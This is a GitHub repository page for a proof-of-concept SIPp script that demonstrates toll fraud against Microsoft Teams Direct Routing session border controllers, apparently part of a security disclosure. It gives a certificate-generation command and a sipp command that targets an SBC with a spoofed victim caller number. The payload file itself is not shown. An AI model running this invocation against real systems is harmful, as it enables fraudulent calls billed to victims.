Skip to content

Microsoft Teams Direct Routing toll fraud proof of concept script for SIPp

License

Notifications You must be signed in to change notification settings

MoritzAbrell/MSTDR-PoC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 

Repository files navigation

MSTDR-PoC

Microsoft Teams Direct Routing toll fraud proof of concept script for SIPp.

Please consider the detailed blog post for more information about the security issues.

Usage

  1. Generate a self-signed certificate:
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout selfsign.key -out selfsign.crt
  1. Execute the poc.xml script with SIPp:
sipp <target-sbc-ip>:<target-port> -sf poc.xml -s <dest-phone-number> \
-m 1 -t l1 -tls_cert selfsign.crt -tls_key selfsign.key \
-key hostname <target-sbc-hostname> -key caller <victim-phone-number>

Disclaimer

Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only.

About

Microsoft Teams Direct Routing toll fraud proof of concept script for SIPp

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published